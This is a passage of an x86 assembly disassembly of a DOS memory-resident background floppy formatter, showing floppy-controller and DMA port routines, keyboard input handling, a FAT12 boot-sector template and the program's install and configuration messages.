;			       SUBROUTINE
;

sub_31		proc	near
		mov	data_100,0F5h
		mov	data_97,9
		mov	data_95,1
loc_188:
		mov	al,data_95
		cbw				; Convrt byte to word
		mov	word ptr ds:[1A9h],0
		mov	word ptr ds:[1ABh],ax
		call	sub_32
		mov	dh,byte ptr ds:[1AFh]
		mov	dl,7
		sub	dl,dh
		mov	dh,data_97
		mov	si,0EDh
		call	sub_14
		mov	si,data_100
		mov	di,3A0h
		cld				; Clear direction
		call	sub_35
		inc	di
		call	sub_35
		mov	data_100,si
		mov	dh,data_97
		mov	dl,14h
		mov	si,3A0h
		call	sub_14
		mov	si,data_100
		lodsw				; String [si] to ax
		mov	word ptr data_98,ax
		mov	data_100,si
		mov	word ptr ds:[1A9h],0
		mov	word ptr ds:[1ABh],ax
		call	sub_32
		mov	dh,byte ptr ds:[1AFh]
		mov	dl,2Dh			; '-'
		sub	dl,dh
		mov	dh,data_97
		mov	si,0EDh
		call	sub_14
		mov	bl,50h			; 'P'
		xor	bh,bh			; Zero register
		cmp	data_31,0
		jne	loc_189			; Jump if not equal
		shr	bx,1			; Shift w/zeros fill
loc_189:
		dec	bx
		mov	ax,2
		mul	bx			; dx:ax = reg * ax
		mov	bl,data_56
		xor	bh,bh			; Zero register
		mul	bx			; dx:ax = reg * ax
		mov	bl,data_53
		add	ax,bx
		mov	bx,word ptr data_98
		cmp	byte ptr ds:[2423h],1
		je	loc_190			; Jump if equal
		shl	bx,1			; Shift w/zeros fill
loc_190:
		sub	ax,bx
		mov	bx,200h
		mul	bx			; dx:ax = reg * ax
		mov	word ptr ds:[1A9h],dx
		mov	word ptr ds:[1ABh],ax
		call	sub_32
		mov	dh,byte ptr ds:[1AFh]
		mov	dl,44h			; 'D'
		sub	dl,dh
		mov	dh,data_97
		mov	si,0EDh
		call	sub_14
		mov	al,data_99
		cmp	data_95,al
		jne	loc_191			; Jump if not equal
		call	sub_13
		retn
loc_191:
		inc	data_95
		inc	data_97
		jmp	loc_188
sub_31		endp


;
;			       SUBROUTINE
;

sub_32		proc	near
		mov	di,0EDh
		call	sub_33
		mov	word ptr ds:[1ADh],bx
		mov	byte ptr ds:[1AFh],bl
		jz	loc_195			; Jump if zero
loc_192:
		cld				; Clear direction
		or	al,30h			; '0'
		stosb				; Store al to es:[di]
		mov	word ptr ds:[1A5h],0
		mov	word ptr ds:[1A7h],0
		push	di
		mov	di,word ptr ds:[1B0h]
		add	di,word ptr ds:[1B2h]
		call	sub_34
		pop	di
		mov	ax,word ptr ds:[1A7h]
		sub	word ptr ds:[1ABh],ax
		jnc	loc_193			; Jump if carry=0
		dec	word ptr ds:[1A9h]
loc_193:
		mov	ax,word ptr ds:[1A5h]
		sub	word ptr ds:[1A9h],ax
		dec	word ptr ds:[1ADh]
		cmp	word ptr ds:[1ADh],0
		je	loc_195			; Jump if equal
		call	sub_33
loc_194:
		cmp	bx,word ptr ds:[1ADh]
		je	loc_192			; Jump if equal
		push	ax
		mov	al,30h			; '0'
		stosb				; Store al to es:[di]
		pop	ax
		dec	word ptr ds:[1ADh]
		cmp	word ptr ds:[1ADh],0
		jne	loc_194			; Jump if not equal
loc_195:
		mov	ax,word ptr ds:[1ABh]
		or	al,30h			; '0'
		cld				; Clear direction
		stosb				; Store al to es:[di]
		mov	al,0
		stosb				; Store al to es:[di]
		retn
sub_32		endp


;
;			       SUBROUTINE
;

sub_33		proc	near
		mov	dx,word ptr ds:[1A9h]
		mov	ax,word ptr ds:[1ABh]
		mov	word ptr ds:[1B0h],0
		mov	word ptr ds:[1B2h],0
		cmp	dx,0
		jne	loc_196			; Jump if not equal
		cmp	ax,2710h
		jb	loc_197			; Jump if below
loc_196:
		mov	bx,2710h
		mov	word ptr ds:[1B0h],8
		div	bx			; ax,dx rem=dx:ax/reg
loc_197:
		cmp	ax,0Ah
		jb	loc_200			; Jump if below
		mov	word ptr ds:[1B2h],6
		xor	dx,dx			; Zero register
		mov	bx,offset 1C8h
loc_198:
		cmp	ax,[bx]
		jge	loc_199			; Jump if > or =
		sub	word ptr ds:[1B2h],2
		sub	bx,2
		jmp	short loc_198
loc_199:
		mov	bx,[bx]
		div	bx			; ax,dx rem=dx:ax/reg
loc_200:
		mov	bx,word ptr ds:[1B0h]
		add	bx,word ptr ds:[1B2h]
		shr	bx,1			; Shift w/zeros fill
		retn
sub_33		endp


;
;			       SUBROUTINE
;

sub_34		proc	near
		and	al,0Fh
		cbw				; Convrt byte to word
		push	ax
		mov	bx,offset 1C2h
		mov	bx,[bx+di]
		mul	bx			; dx:ax = reg * ax
		add	word ptr ds:[1A7h],ax
		jnc	loc_201			; Jump if carry=0
		inc	dx
loc_201:
		add	word ptr ds:[1A5h],dx
		mov	bx,offset 1B4h
		pop	ax
		mov	bx,[bx+di]
		mul	bx			; dx:ax = reg * ax
		add	word ptr ds:[1A5h],ax
		retn
sub_34		endp


;
;			       SUBROUTINE
;

sub_35		proc	near
		lodsb				; String [si] to al
		call	sub_36
		stosw				; Store ax to es:[di]
		lodsb				; String [si] to al
		call	sub_36
		stosw				; Store ax to es:[di]
		retn
sub_35		endp


;
;			       SUBROUTINE
;

sub_36		proc	near
		mov	ah,al
		and	ah,0Fh
		mov	cl,4
		shr	al,cl			; Shift w/zeros fill
		and	al,0Fh
		cmp	al,0Ah
		jge	loc_202			; Jump if > or =
		add	al,30h			; '0'
		jmp	short loc_203
		db	90h
loc_202:
		add	al,37h			; '7'
loc_203:
		cmp	ah,0Ah
		jge	loc_204			; Jump if > or =
		add	ah,30h			; '0'
		jmp	short loc_ret_205
		db	90h
loc_204:
		add	ah,37h			; '7'

loc_ret_205:
		retn
sub_36		endp


;
;			       SUBROUTINE
;

sub_37		proc	near
		mov	al,data_29
		mov	bx,offset data_30
		cbw				; Convrt byte to word
		add	bx,ax
		mov	al,[bx]
		mov	data_31,ax
		retn
sub_37		endp


;
;			       SUBROUTINE
;

sub_38		proc	near
		mov	ah,1
		mov	cx,7
		int	10h			; Video display   ah=functn 01h
						;  set cursor mode in cx
		mov	ah,3
		mov	bh,data_104
		int	10h			; Video display   ah=functn 03h
						;  get cursor loc in dx, mode cx
		mov	data_108,dh
		mov	data_109,dl
		mov	di,137h
		mov	data_101,0
loc_206:
		mov	ah,0
		int	16h			; Keyboard i/o  ah=function 00h
						;  get keybd char in al, ah=scan
		cmp	al,0Dh
		jne	loc_207			; Jump if not equal
		retn
loc_207:
		cmp	al,1Bh
		jne	loc_208			; Jump if not equal
		pop	ax
		jmp	loc_41
loc_208:
		cmp	al,10h
		je	loc_209			; Jump if equal
		cmp	ax,5300h
		jne	loc_210			; Jump if not equal
loc_209:
		call	sub_41
		call	sub_41
		jmp	short loc_206
loc_210:
		cmp	ax,4B00h
		je	loc_211			; Jump if equal
		cmp	al,8
		jne	loc_212			; Jump if not equal
loc_211:
		call	sub_41
		jmp	short loc_206
loc_212:
		cmp	al,30h			; '0'
		jb	loc_213			; Jump if below
		cmp	al,39h			; '9'
		jg	loc_213			; Jump if >
		cmp	data_101,2
		je	loc_213			; Jump if equal
		cld				; Clear direction
		stosb				; Store al to es:[di]
		inc	data_101
		inc	data_109
		call	sub_10
		jmp	short loc_206
loc_213:
		call	sub_11
		jmp	short loc_206
sub_38		endp


;
;			       SUBROUTINE
;

sub_39		proc	near
		mov	si,offset data_33+6	; (' ')
loc_214:
		cmp	al,0
		je	loc_215			; Jump if equal
		add	si,7
		dec	al
		jmp	short loc_214
loc_215:
		mov	di,offset data_189
loc_216:
		lodsb				; String [si] to al
		cmp	al,0
		jne	loc_217			; Jump if not equal
		retn
loc_217:
		stosb				; Store al to es:[di]
sub_39		endp


;
;			       SUBROUTINE
;

sub_40		proc	near
		jmp	short loc_216
sub_40		endp


;
;			       SUBROUTINE
;

sub_41		proc	near
		cmp	data_101,0
		je	loc_ret_218		; Jump if equal
		dec	di
		dec	data_101
		dec	data_109
		call	sub_42
		mov	al,20h			; ' '
		call	sub_10
		call	sub_42

loc_ret_218:
		retn
sub_41		endp


;
;			       SUBROUTINE
;

sub_42		proc	near
		mov	ah,2
		mov	bh,data_104
		mov	dh,data_108
		mov	dl,data_109
		int	10h			; Video display   ah=functn 02h
						;  set cursor location in dx
		retn
sub_42		endp


;
;			       SUBROUTINE
;

sub_43		proc	near
		push	ds
		mov	ds,data_91
		mov	si,data_4e
		mov	di,offset data_115
		mov	cx,7
		cld				; Clear direction
		repe	cmpsw			; Rep zf=1+cx >0 Cmp [si] to es:[di]
		cmp	cx,0
		je	loc_219			; Jump if equal
		mov	di,offset data_113
		mov	si,data_4e
		mov	cx,6
		rep	movsw			; Rep when cx >0 Mov [si] to es:[di]
loc_219:
		pop	ds
		call	sub_44
		mov	di,offset data_115
		mov	si,data_92
		mov	cx,6
		rep	movsw			; Rep when cx >0 Mov [si] to es:[di]
		retn
sub_43		endp


;
;			       SUBROUTINE
;

sub_44		proc	near
		push	es
		mov	si,data_92
		mov	es,data_91
		mov	di,data_4e
		mov	cx,6
		rep	movsw			; Rep when cx >0 Mov [si] to es:[di]
		pop	es
		retn
sub_44		endp


;
;			       SUBROUTINE
;

sub_45		proc	near
		call	sub_28
		jnc	loc_220			; Jump if carry=0
		retn
loc_220:
		call	sub_43
		retn
sub_45		endp


;
;			       SUBROUTINE
;

sub_46		proc	near
		call	sub_28
		jnc	loc_221			; Jump if carry=0
		clc				; Clear carry flag
		retn
loc_221:
		cmp	data_187,6666h
		je	loc_222			; Jump if equal
		mov	data_92,3CEh
		mov	ah,data_65
		call	sub_47
		mov	byte ptr data_184+26h,al	; ('')
		mov	byte ptr data_184+28h,ah	; ('')
		call	sub_43
		retn
loc_222:
		cmp	data_92,3AAh
		jne	loc_ret_223		; Jump if not equal
		mov	data_92,0D5h
		call	sub_44

loc_ret_223:
		retn
sub_46		endp


;
;			       SUBROUTINE
;

sub_47		proc	near
		cmp	ah,0Ah
		jl	loc_226			; Jump if <
		mov	al,31h			; '1'
loc_224:
		sub	ah,0Ah
		cmp	ah,0Ah
		jl	loc_225			; Jump if <
		add	al,1
		jmp	short loc_224
loc_225:
		or	ah,30h			; '0'
		retn
loc_226:
		or	ah,30h			; '0'
		mov	al,20h			; ' '
		retn
sub_47		endp


;
;			       SUBROUTINE
;

sub_48		proc	near
		cld				; Clear direction
		mov	di,offset 14Dh
loc_227:
		mov	al,data_65
		stosb				; Store al to es:[di]
		mov	al,data_64
		stosb				; Store al to es:[di]
		mov	al,data_66
		stosb				; Store al to es:[di]
		mov	al,2
		stosb				; Store al to es:[di]
		inc	data_66
		mov	al,data_66
		cmp	al,data_56
		jle	loc_227			; Jump if < or =
		mov	data_66,1
		retn
sub_48		endp


;
;			       SUBROUTINE
;

sub_49		proc	near
		pop	ax
		mov	word ptr ds:[221h],ax
		mov	data_82,21E2h
		mov	al,byte ptr ds:[21Ah]
		mov	data_66,al
		mov	data_68,28E9h
		mov	data_67,1FFh
		mov	data_69,4Ah		; 'J'
		mov	data_70,0C5h
		mov	data_85,27F1h
		call	sub_75
		mov	data_82,220Dh
		mov	ax,word ptr ds:[242Ch]
		mov	cl,byte ptr ds:[21Ah]
		add	cl,al
		cmp	cl,data_56
		jle	loc_228			; Jump if < or =
		inc	data_64
		sub	cl,data_56
loc_228:
		mov	data_66,cl
		call	sub_75
		inc	byte ptr ds:[21Ah]
		jmp	word ptr ds:[221h]

; External Entry into Subroutine 

sub_50:
		mov	si,offset data_220
		mov	cx,word ptr ds:[21Dh]
		inc	cx
		sub	cx,si
		jbe	loc_229			; Jump if below or =
		mov	di,offset data_214
		cld				; Clear direction
		repne	movsb			; Rep zf=0+cx >0 Mov [si] to es:[di]
		xor	al,al			; Zero register
		mov	cx,1Bh
		mov	di,offset data_220
		repne	stosb			; Rep zf=0+cx >0 Store al to es:[di]
loc_229:
		add	word ptr ds:[21Fh],200h
		mov	word ptr ds:[21Dh],0
		retn
sub_49		endp


;
;			       SUBROUTINE
;

sub_51		proc	near
		mov	al,data_65
		dec	al
		cbw				; Convrt byte to word
		mov	bl,4
		div	bl			; al, ah rem = ax/reg
		mov	cl,ah
		cbw				; Convrt byte to word
		mov	di,ax
		rol	cl,1			; Rotate
		add	cl,data_64
		mov	al,80h
		ror	al,cl			; Rotate
		or	byte ptr ds:[139h][di],al
		retn
sub_51		endp


;
;			       SUBROUTINE
;

sub_52		proc	near
		mov	data_65,0
		mov	data_64,0
		mov	data_66,1
		mov	data_94,0
		mov	data_63,0
		mov	data_59,0F6h
		retn
sub_52		endp


;
;			       SUBROUTINE
;

sub_53		proc	near
		xor	al,al			; Zero register
		mov	cx,200h
		mov	di,offset data_214
		cld				; Clear direction
		repne	stosb			; Rep zf=0+cx >0 Store al to es:[di]
		retn
sub_53		endp

		mov	di,data_100
		mov	ax,0D1BAh
		cld				; Clear direction
		stosw				; Store ax to es:[di]
		stosw				; Store ax to es:[di]
		mov	ax,data_54
		stosw				; Store ax to es:[di]
		mov	data_100,di
		inc	data_95
		inc	data_99
		retn

;
;			       SUBROUTINE
;

sub_54		proc	near
		mov	word ptr data_98,0
		mov	si,offset 139h
		cld				; Clear direction
loc_230:
		lodsb				; String [si] to al
		mov	cl,4
loc_231:
		mov	ah,al
		and	ah,3
		cmp	ah,3
		je	loc_232			; Jump if equal
		cmp	ah,0
		je	loc_233			; Jump if equal
		mov	bl,data_56
		call	sub_57
		jmp	short loc_233
		db	90h
loc_232:
		mov	bl,data_56
		shl	bl,1			; Shift w/zeros fill
		call	sub_57
loc_233:
		dec	cl
		jz	loc_234			; Jump if zero
		shr	al,1			; Shift w/zeros fill
		shr	al,1			; Shift w/zeros fill
		jmp	short loc_231
loc_234:
		cmp	si,14Dh
		jl	loc_230			; Jump if <
		retn
sub_54		endp


;
;			       SUBROUTINE
;

sub_55		proc	near
		push	cx
		mov	al,byte ptr ds:[2423h]
		cbw				; Convrt byte to word
		mov	bx,ax
		mov	al,data_53
		cbw				; Convrt byte to word
		add	ax,word ptr ds:[223h]
		xor	dx,dx			; Zero register
		div	bx			; ax,dx rem=dx:ax/reg
		call	sub_59
		xor	dx,dx			; Zero register
		mov	bx,2
		div	bx			; ax,dx rem=dx:ax/reg
		call	sub_58
		mov	bx,3
		mul	bx			; dx:ax = reg * ax
		add	ax,3
		add	ax,cx
		pop	cx
		retn
sub_55		endp


;
;			       SUBROUTINE
;

sub_56		proc	near
		mov	ah,data_95
		inc	ah
		call	sub_47
		mov	data_190,ax
		retn
sub_56		endp


;
;			       SUBROUTINE
;

sub_57		proc	near
		xor	bh,bh			; Zero register
		cmp	data_56,9
		jne	loc_235			; Jump if not equal
		clc				; Clear carry flag
		rcr	bx,1			; Rotate thru carry
		adc	bx,0
loc_235:
		add	word ptr data_98,bx
		retn
sub_57		endp


;
;			       SUBROUTINE
;

sub_58		proc	near
		cmp	dx,0
		je	loc_236			; Jump if equal
		mov	cx,1
		retn
loc_236:
		mov	cx,dx
		retn
sub_58		endp


;
;			       SUBROUTINE
;

sub_59		proc	near
		test	al,1
		jz	loc_237			; Jump if zero
		mov	word ptr ds:[229h],2
		retn
loc_237:
		mov	word ptr ds:[229h],0
		retn
sub_59		endp


;
;			       SUBROUTINE
;

sub_60		proc	near
		mov	di,offset 139h
		xor	al,al			; Zero register
		mov	cx,14h
		cld				; Clear direction
		repne	stosb			; Rep zf=0+cx >0 Store al to es:[di]
		retn
sub_60		endp


;
;			       SUBROUTINE
;

sub_61		proc	near
		mov	si,data_31
		mov	bx,offset data_41
		mov	al,[bx+si]
		mov	byte ptr ds:[2423h],al
		mov	bx,offset data_47
		mov	al,[bx+si]
		mov	byte ptr ds:[242Bh],al
		mov	bx,offset data_39
		mov	al,[bx+si]
		mov	data_71,al
		mov	bx,offset data_43
		mov	al,[bx+si]
		mov	data_55,al
		mov	bx,offset data_44
		mov	al,[bx+si]
		mov	data_56,al
		and	ax,0FFh
		mov	word ptr ds:[242Eh],ax
		mov	bx,offset data_45
		mov	al,[bx+si]
		mov	data_57,al
		mov	bx,offset data_46
		mov	al,[bx+si]
		mov	data_58,al
		mov	bx,offset data_52
		mov	al,[bx+si]
		mov	data_53,al
		shl	si,1			; Shift w/zeros fill
		mov	bx,offset data_48
		mov	ax,[bx+si]
		mov	word ptr ds:[2427h],ax
		mov	bx,offset data_40
		mov	ax,[bx+si]
		mov	data_61,ax
		mov	bx,offset data_37
		mov	ax,[bx+si]
		mov	word ptr data_60,ax
		mov	bx,69h
		mov	ax,[bx+si]
		mov	word ptr ds:[2429h],ax
		mov	bx,offset data_50
		mov	ax,[bx+si]
		mov	word ptr ds:[242Ch],ax
		mov	bx,offset data_51
		mov	ax,[bx+si]
		mov	data_54,ax
		mov	ah,4
		int	1Ah			; Real time clock   ah=func 04h
						;  get date  cx=year, dx=mon/day
		mov	word ptr ds:[243Fh],dx
		cmp	data_31,0
		jne	loc_238			; Jump if not equal
		mov	word ptr ds:[216h],143h
		retn
loc_238:
		mov	word ptr ds:[216h],14Dh
		retn
sub_61		endp

		jmp	short loc_239
		nop
		inc	dx
		inc	si
		dec	di
		push	dx
		dec	bp
		inc	cx
		push	sp
		and	[bx+si],al
		add	al,[bx+si]
		add	[bx+si],ax
		add	al,[bx+si]
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	al,[bx+si]
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		sub	[bx+si],ax
		add	[bx+si],al
		add	[bp+4Fh],cl
		db	' NAME    FAT12   ', 0Dh, 0Ah, ' '
		db	'Non-System Disk ...', 0Dh, 0Ah, ' '
		db	'Replace And Press Any Key When R'
		db	'eady...', 0Dh, 0Ah, 0
loc_239:
		xor	ax,ax			; Zero register
		cli				; Disable interrupts
		mov	ss,ax
		mov	sp,7C00h
		sti				; Enable interrupts
		push	cs
		pop	ds
		mov	si,data_234e
		cld				; Clear direction
loc_240:
		lodsb				; String [si] to al
		test	al,al
		jz	loc_241			; Jump if zero
		mov	ah,0Eh
		xor	bx,bx			; Zero register
		int	10h			; Video display   ah=functn 0Eh
						;  write char al, teletype mode
		jmp	short loc_240
loc_241:
		mov	ah,0
		int	16h			; Keyboard i/o  ah=function 00h
						;  get keybd char in al, ah=scan
		int	19h			; Bootstrap loader
		db	347 dup (0)
		db	 55h,0AAh

;
;			       SUBROUTINE
;

sub_62		proc	near
		mov	byte ptr ds:[22Fh],1
		mov	ds,data_25
		mov	al,0FFh
		mov	ds:dsk_motor_tmr_,al
		mov	al,ds:dsk_motor_stat_
		and	al,0Fh
		push	cs
		pop	ds
		cmp	al,0
		je	loc_242			; Jump if equal
		retn
loc_242:
		mov	cl,data_29
		mov	al,10h
		shl	al,cl			; Shift w/zeros fill
		mov	ah,al
		or	al,cl
		or	al,0Ch
		mov	dx,3F2h
		out	dx,al			; port 3F2h, dsk0 contrl output
		mov	cl,4
		rol	ah,cl			; Rotate
		mov	ds,data_25
		mov	ds:dsk_motor_stat_,ah
		push	cs
		pop	ds
		mov	byte ptr ds:[22Dh],2
		call	sub_7
		retn
sub_62		endp


;
;			       SUBROUTINE
;

sub_63		proc	near
		pop	ax
		mov	data_86,ax
		call	sub_62
		call	sub_67
		jmp	short loc_243
		db	90h

; External Entry into Subroutine 

sub_64:
		pop	ax
		mov	data_86,ax
		mov	data_63,0
		call	sub_62
		call	sub_66
loc_243:
		call	sub_79
		call	sub_68
		jc	loc_244			; Jump if carry Set
		jmp	data_86
loc_244:
		clc				; Clear carry flag
		jmp	loc_123
sub_63		endp


;
;			       SUBROUTINE
;

sub_65		proc	near
		pop	ax
		mov	data_88,ax
		call	sub_64
		test	data_73,0C0h
		jz	loc_245			; Jump if zero
		call	sub_64
		test	data_73,0C0h
		jz	loc_245			; Jump if zero
		jmp	loc_123
loc_245:
		mov	al,data_65
		cmp	data_31,0
		jne	loc_246			; Jump if not equal
		shl	al,1			; Shift w/zeros fill
loc_246:
		mov	data_63,al
		call	sub_63
		jmp	data_88

; External Entry into Subroutine 

sub_66:
		mov	ah,7
		call	sub_71
		mov	ah,data_29
		call	sub_71
		retn
sub_65		endp


;
;			       SUBROUTINE
;

sub_67		proc	near
		mov	ah,0Fh
		call	sub_71
		mov	ah,data_29
		call	sub_71
		mov	ah,data_63
		call	sub_71
		retn
sub_67		endp


;
;			       SUBROUTINE
;

sub_68		proc	near
		mov	ah,8
		call	sub_71
		call	sub_70
		mov	data_73,al
		call	sub_70
		mov	data_72,al
		retn
sub_68		endp


;
;			       SUBROUTINE
;

sub_69		proc	near
		call	sub_70
		mov	data_73,al
		call	sub_70
		mov	data_74,al
		call	sub_70
		mov	data_75,al
		call	sub_70
		mov	data_77,al
		call	sub_70
		mov	data_78,al
		call	sub_70
		mov	data_79,al
		call	sub_70
		mov	data_80,al
		retn
sub_69		endp


;
;			       SUBROUTINE
;

sub_70		proc	near
		mov	dx,3F4h
		xor	cx,cx			; Zero register

locloop_247:
		in	al,dx			; port 3F4h, dsk0 cntrlr status
		and	al,0C0h
		cmp	al,0C0h
		je	loc_248			; Jump if equal
		loop	locloop_247		; Loop if cx > 0

		pop	ax
		stc				; Set carry flag
		retn
loc_248:
		inc	dx
		in	al,dx			; port 3F5h, dsk0 controlr data
		clc				; Clear carry flag
		retn
sub_70		endp


;
;			       SUBROUTINE
;

sub_71		proc	near
		mov	dx,3F4h
		xor	cx,cx			; Zero register

locloop_249:
		in	al,dx			; port 3F4h, dsk0 cntrlr status
		and	al,0C0h
		cmp	al,80h
		je	loc_250			; Jump if equal
		loop	locloop_249		; Loop if cx > 0

		pop	ax
		stc				; Set carry flag
		retn
loc_250:
		mov	al,ah
		inc	dx
		out	dx,al			; port 3F5h, dsk0 controlr data
		clc				; Clear carry flag
		retn
sub_71		endp


;
;			       SUBROUTINE
;

sub_72		proc	near
		mov	dx,3F7h
		mov	al,data_71
		out	dx,al			; port 3F7h ??I/O Non-standard
		retn
sub_72		endp


;
;			       SUBROUTINE
;

sub_73		proc	near
		mov	al,2
		out	0Ch,al			; port 0Ch, DMA-1 clr byte ptr
		jmp	short $+2		; delay for I/O
		mov	al,ah
		out	0Bh,al			; port 0Bh, DMA-1 mode reg
		mov	bx,data_68
		push	cs
		pop	ax
		mov	cl,4
		rol	ax,cl			; Rotate
		mov	ch,al
		and	al,0F0h
		add	ax,bx
		jnc	loc_251			; Jump if carry=0
		inc	ch
loc_251:
		out	4,al			; port 4, DMA-1 bas&add ch 2
		jmp	short $+2		; delay for I/O
		mov	al,ah
		out	4,al			; port 4, DMA-1 bas&add ch 2
		jmp	short $+2		; delay for I/O
		mov	al,ch
		and	al,0Fh
		out	81h,al			; port 81h, DMA page reg ch 2
		mov	ax,data_67
		out	5,al			; port 5, DMA-1 bas&cnt ch 2
		jmp	short $+2		; delay for I/O
		mov	al,ah
		out	5,al			; port 5, DMA-1 bas&cnt ch 2
		jmp	short $+2		; delay for I/O
		mov	al,2
		out	0Ah,al			; port 0Ah, DMA-1 mask reg bit
		retn
sub_73		endp


;
;			       SUBROUTINE
;

sub_74		proc	near
		pop	ax
		mov	data_86,ax
		mov	data_68,28E9h
		mov	data_67,1FFh
		mov	data_69,46h		; 'F'
		mov	data_70,0E6h
		call	sub_62
		call	sub_72
		mov	ah,data_69
		call	sub_73
		call	sub_76
		jc	loc_252			; Jump if carry Set
		call	sub_79
		call	sub_69
		jc	loc_252			; Jump if carry Set
		jmp	data_86
loc_252:
		clc				; Clear carry flag
		call	sub_7
		jmp	loc_123
sub_74		endp


;
;			       SUBROUTINE
;

sub_75		proc	near
		pop	ax
		mov	data_86,ax
		call	sub_62
		call	sub_72
		mov	ah,data_69
		call	sub_73
		call	data_85
		jc	loc_253			; Jump if carry Set
		call	sub_79
		call	sub_69
		jc	loc_253			; Jump if carry Set
		jmp	data_86
loc_253:
		clc				; Clear carry flag
		call	sub_7
		jmp	loc_123
sub_75		endp


;
;			       SUBROUTINE
;

sub_76		proc	near
		mov	ah,data_70
		call	sub_71
		mov	ah,data_29
		cmp	data_64,0
		je	loc_254			; Jump if equal
		or	ah,4
loc_254:
		call	sub_71
		mov	ah,data_65
		call	sub_71
		mov	ah,data_64
		call	sub_71
		mov	ah,data_66
		call	sub_71
		mov	ah,2
		call	sub_71
		mov	ah,data_56
		call	sub_71
		mov	ah,data_57
		call	sub_71
		mov	ah,0FFh
		call	sub_71
		retn
sub_76		endp

		mov	ah,4Dh			; 'M'
		call	sub_71
		mov	ah,data_29
		cmp	data_64,0
		je	loc_255			; Jump if equal
		or	ah,4
loc_255:
		call	sub_71
		mov	ah,2
		call	sub_71
		mov	ah,data_56
		call	sub_71
		mov	ah,data_58
		call	sub_71
		mov	ah,data_59
		call	sub_71
		retn

;
;			       SUBROUTINE
;

sub_77		proc	near
		mov	ah,4
		call	sub_71
		mov	ah,data_29
		call	sub_71
		call	sub_70
		mov	data_76,al
		retn
sub_77		endp


;
;			       SUBROUTINE
;

sub_78		proc	near
		pop	ax
		mov	data_87,ax
		call	sub_48
		mov	ax,data_61
		mov	data_67,ax
		mov	data_68,14Dh
		mov	data_69,4Ah		; 'J'
		mov	data_85,2837h
		call	sub_75
		test	data_73,0C0h
		jnz	loc_256			; Jump if not zero
		jmp	data_87
loc_256:
		test	data_74,2
		jz	loc_257			; Jump if zero
		jmp	loc_86
loc_257:
		cmp	data_94,2
		jne	loc_258			; Jump if not equal
		mov	data_94,0
		jmp	loc_93
loc_258:
		inc	data_94
		call	sub_65
		test	data_73,0C0h
		jnz	loc_259			; Jump if not zero
		jmp	data_82
loc_259:
		jmp	loc_123
sub_78		endp


;
;			       SUBROUTINE
;

sub_79		proc	near
		mov	cx,18h

locloop_260:
		call	sub_7
		cmp	byte ptr ds:[22Fh],0
		jne	loc_261			; Jump if not equal
		retn
loc_261:
		loop	locloop_260		; Loop if cx > 0

		pop	ax
		jmp	loc_123
sub_79		endp

data_214	db	0
data_215	dw	0
		db	8 dup (0)
data_217	dw	0
		db	26 dup (0)
data_218	dw	0
data_219	dw	0
		db	469 dup (0)
data_220	db	0
		db	154 dup (0)
data_221	db	0Dh, 0Ah, ' Mem Resident Format A'
		db	'lready Installed', 0Dh, 0Ah, 'Al'
		db	't + Left Shift + Right Shift Wil'
		db	'l Activate', 0Dh, 0Ah, '$'
data_222	db	0Dh, 0Ah, 'Background Formatter I'
		db	's Installed', 0Dh, 0Ah, 'Alt + L'
		db	'eft Shift + Right Shift Will Act'
		db	'ivate', 0Dh, 0Ah, '$'
data_223	db	0Dh, 0Ah, 'No Diskette Drive Conn'
		db	'ect', 0Dh, 0Ah, 'Program Termina'
		db	'ted !', 0Dh, 0Ah, '$'
		db	'There Are '
data_224	db	0
		db	' Diskette Drives Connected'
		db	0
data_225	db	0
		db	 20h,0C4h
		db	14 dup (0C4h)
data_227	db	' ', 0
		db	'Is This Configuration Correct ? '
		db	'[Y]', 0
		db	'How Many Diskette Drives ( Not I'
		db	'nclude Fixed Disk ) ?', 0
		db	'DRIVE ', 0
		db	' ( 0 - 360K, 1 - 1.2M, 2 - 720K,'
		db	' 3 - 1.44M ) ?', 0
loc_262:
		push	cs
		pop	ds
		push	cs
		pop	es
		call	sub_86
		mov	word ptr ds:[1E2h],cs
		mov	word ptr ds:[1E4h],cs
		mov	word ptr ds:[1DAh],cs
		mov	word ptr ds:[1E0h],cs
		mov	word ptr data_24,0EBFEh
		cli				; Disable interrupts
		mov	word ptr ds:[1E6h],ss
		mov	word ptr ds:[1E8h],sp
		push	cs
		pop	ss
		mov	sp,2B84h
		mov	ax,202h
		push	ax
		push	cs
		mov	ax,data_81
		push	ax
		mov	word ptr ds:[1DCh],sp
		mov	ss,word ptr ds:[1E6h]
		mov	sp,word ptr ds:[1E8h]
		sti				; Enable interrupts
		call	sub_80
		call	sub_23
		call	sub_88
		call	sub_24
		mov	al,0Eh
		mov	si,19Dh
		mov	dx,12CCh
		call	sub_87
		mov	al,13h
		mov	si,1A1h
		mov	dx,12E6h
		call	sub_87
		mov	al,9
		mov	si,199h
		mov	dx,127Ah
		call	sub_87
		mov	al,8
		mov	si,195h
		mov	dx,11E0h
		call	sub_87
		mov	dx,offset data_222	; ('')
		mov	ah,9
		int	21h			; DOS Services  ah=function 09h
						;  display char string at ds:dx
		mov	al,0
		mov	dx,2B84h
		mov	cl,4
		shr	dx,cl			; Shift w/zeros fill
		add	dx,11h
		mov	ah,31h			; '1'
		int	21h			; DOS Services  ah=function 31h
						;  terminate & stay resident
						;   al=return code,dx=paragraphs

;
;			       SUBROUTINE
;

sub_80		proc	near
		push	es
		mov	es,cs:data_25
		mov	dx,es:video_port_
		add	dx,6
		mov	cs:data_90,dx
		pop	es
		int	11h			; Put equipment bits in ax
		mov	bh,al
		and	bh,30h			; '0'
		mov	data_91,0B800h
		cmp	bh,30h			; '0'
		jne	loc_263			; Jump if not equal
		mov	data_91,0B000h
loc_263:
		mov	bh,al
		and	bh,1
		and	ax,0C0h
		shl	ax,1			; Shift w/zeros fill
		shl	ax,1			; Shift w/zeros fill
		add	ah,bh
		cmp	ah,0
		jne	loc_264			; Jump if not equal
		mov	dx,offset data_223	; ('')
		mov	ah,9
		int	21h			; DOS Services  ah=function 09h
						;  display char string at ds:dx
		jmp	loc_277
loc_264:
		mov	al,ah
		cmp	al,3
		jl	loc_265			; Jump if <
		mov	al,2
loc_265:
		mov	data_28,al
		or	al,30h			; '0'
		mov	data_224,al
		call	sub_81
		retn

; External Entry into Subroutine 

sub_81:
		push	ax
		push	es
		push	di
		mov	bx,0Dh
		mov	dx,0
loc_266:
		mov	si,dx
		push	ax
		push	bx
		push	dx
		mov	ah,8
		int	13h			; Disk  dl=drive a  ah=func 08h
						;  get drive parameters, bl=type
						;   cx=cylinders, dh=max heads
						;   es:di= ptr to drive table
		jc	loc_267			; Jump if carry Set
